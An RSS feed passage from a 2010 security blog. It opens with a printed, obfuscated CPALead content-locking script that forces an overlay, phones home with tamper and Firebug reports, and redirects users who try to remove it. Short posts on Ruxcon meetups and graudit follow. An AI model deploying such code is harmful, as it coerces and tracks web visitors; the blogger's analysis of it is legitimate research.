var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');
The next steps would be far to time consuming for me given the glaringly obvious conclusion you can draw by googleing for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion there isn't anything new here. The techniques aren't very advanced, but god enough to keep the general public ignorant of what's really going on. I did find the firebug / anti tamper code used in the last bit of js interesting, but I'm sure that malware analysts have seen it thousands of times before.]]> http://www.justanotherhacker.com/2010/06/chasing-a-rabbit-down-the-hole.html http://www.justanotherhacker.com/2010/06/chasing-a-rabbit-down-the-hole.html js malware obfucation Fri, 11 Jun 2010 10:35:54 +1000 June 2010 Ruxcon Melbourne Monthly Meetup 
Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)

RMIT Building 8 entrance is off Swanston Street (just past Swanston and 
La Trobe). Please take the lift to Level 9 and make your way to Room 42. 
We will have directions posted up in the building.

Presentations
=============

Unsanitary Web Activities - Tim Noise (MovingData)

In the land of the internet, web developers are constantly rolling out 
new applications and letting them free into the Internet. Many with 
little knowledge or experience in security. They assume the users will 
provide data in a manner they expect. This talk will cover webapp 
security basics and commonplace attacks, showing you the effect this 
oversight can have, and how to prevent it.

Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup  
(Stratsec)

In this talk the presenter will discuss various security incidents he 
has been involved in during the course of his career.  Starting with old 
school bof through to modern day malware and blackmail.  This isn't a 
deep technical analysis of each incident but an overview of the 
charateristics of each of the attacks and what the repurcussions were to 
the organisation or individual.

Static analysis with Graudit - Eldar Marcussen

Graudit is a rough audit tool, that can be used to find vulnerabilities 
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this 
presentation I will show how to get the most out of graudit.

]]> http://www.justanotherhacker.com/2010/06/june-2010-ruxcon-melbourne-monthly-meetup.html http://www.justanotherhacker.com/2010/06/june-2010-ruxcon-melbourne-monthly-meetup.html graudit hacking news presentation ruxcon security Tue, 08 Jun 2010 11:54:59 +1000 Graudit version 1.6 released
You can download the latest version from the graudit download page.
Please note that with the current changes to the test suite there is no development (.src.tar.gz) release. If you are a package maintainer or otherwise wish to use the development release you can either clone the git repository or wait for the upcoming 1.7 release.
]]> http://www.justanotherhacker.com/2010/05/graudit-version-16-released.html http://www.justanotherhacker.com/2010/05/graudit-version-16-released.html audit code review graudit news project security Fri, 14 May 2010 21:48:55 +1000 USB Iphone tethering for Ubuntu - No jailbreak
First we add the third party repository and update the apt cache (this has security implications, so don't cry if your wall paper suddenly changes to tubgirl): 
    sudo add-apt-repository ppa:pmcenery/ppa
    sudo apt-get update
Then we install the required modules (accept the dependencies): 
    sudo apt-get install gvfs ipheth-utils
This will install and insmod the ipheth driver. Make sure that internet sharing is enabled on your iphone and plug it in. It should show up as a wired connection. If something went wrong check your dmesg. I have experience timeouts on TX which caused it not to initialize. Replugging did the trick. ]]> http://www.justanotherhacker.com/2010/04/usb-iphone-tethering-for-ubuntu---no-jailbreak.html http://www.justanotherhacker.com/2010/04/usb-iphone-tethering-for-ubuntu---no-jailbreak.html linux not hacking Tue, 20 Apr 2010 13:14:02 +1000 From xss to root - the apache post mortem
Read the entire story at https://blogs.apache.org/infra/entry/apache_org_04_09_2010
]]> http://www.justanotherhacker.com/2010/04/from-xss-to-root---the-apache-post-mortem.html http://www.justanotherhacker.com/2010/04/from-xss-to-root---the-apache-post-mortem.html hacking news security xss Thu, 15 Apr 2010 21:10:09 +1000 Ruxcon Melbourne Monthly Meetup From Chris Spencer on the ruxcon mailing list:

As part of a new initiative, the Ruxcon Team in conjunction with RMIT Information Security Collective, have established a monthly meeting in Melbourne. The aim of the meeting is to encourage individuals to perform a short presentation on computer security or a related topic in front of a small audience. The monthly meetings are open to everyone and free to attend.

The presentations are intended to be short (between 5-20 minutes), a projector and screen will be provided. We encourage participation from everyone and hope to see a variety of presentations over the coming months. Any topic is welcome, a presentation could be as simple as speaking for 5 minutes about a project you are currently working on, or day to day work tasks within your given field.

If you are interested in participating please email us at ruxcon ruxcon org au.

Please join us on Friday and help make the kickoff a success!

Details for the kickoff:

Date: Friday, 23rd April
Time: 6:00pm
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room 008.09.041 (Building 8, Level 9, Room 41)

Presentations:

  • SQL Injections 101 - Louis Nyffenegger (@snyff)
  • Malware Analysis for Incident Response - Ash Fox
  • Binary Analysis Basics - Chris Spencer
]]> http://www.justanotherhacker.com/2010/04/ruxcon-melbourne-monthly-meetup.html http://www.justanotherhacker.com/2010/04/ruxcon-melbourne-monthly-meetup.html news ruxcon Thu, 08 Apr 2010 21:21:41 +1000 Tool review: Bugle Bugle is a neat tool which uses google and regular expressions to detect security defects in code. It makes it super quick to find vulnerable code.

The downside is that the code is often old and the vulnerability has been found, disclosed and fixed. And checking all those hits take time. Still it is well worth a spin.

Disclaimer:
Bugle's use of regular expressions to locate code defects was what initially prompted me to organize my messy scripts into the open source script graudit
]]> http://www.justanotherhacker.com/2010/04/tool-review-bugle.html http://www.justanotherhacker.com/2010/04/tool-review-bugle.html audit security tools vulnerability Wed, 07 Apr 2010 22:43:55 +1000 Ruxcon 2010
Please see http://www.ruxcon.org.au for more details.
]]> http://www.justanotherhacker.com/2010/03/ruxcon-2010.html http://www.justanotherhacker.com/2010/03/ruxcon-2010.html conference hacking news security Wed, 31 Mar 2010 16:11:48 +1000 Post mortems - Wargames smpCTF looming I thought I would link to these excellent "post mortems" from
CCDC 2010 and Reiners exploiting past sql filters, something we have seen in the last two codegate and owaspeu10 challenges...
CCDC 2010 - Part1
CCDC 2010 - Part 2
Reiners - Exploitiing hard filtered sql injection article]]> http://www.justanotherhacker.com/2010/03/post-mortems---wargames.html http://www.justanotherhacker.com/2010/03/post-mortems---wargames.html challenge ctf hacking sql injection wargames Tue, 23 Mar 2010 14:01:10 +1000 password cracking, dictionary attack statistics
password-coverage.png
He has made the top X password dictionary files and other password lists available in his wiki at http://www.skullsecurity.org/wiki/index.php/Passwords. I you want more details you can read the whole article at http://www.skullsecurity.org/blog/?p=516


]]> http://www.justanotherhacker.com/2010/03/password-cracking-dictionary-attack-statistics.html http://www.justanotherhacker.com/2010/03/password-cracking-dictionary-attack-statistics.html cracking password security Tue, 23 Mar 2010 07:30:47 +1000 smp Capture The Flag (CTF) 2010 Hacker Olympics
Do you have what it takes to compete...?

More details at http://www.smpctf.com/ dates and times have not yet been decided.

]]> http://www.justanotherhacker.com/2010/03/smp-capture-the-flag-ctf-2010-hacker-olympics.html http://www.justanotherhacker.com/2010/03/smp-capture-the-flag-ctf-2010-hacker-olympics.html challenge ctf hacking news security wargames Thu, 18 Mar 2010 13:52:48 +1000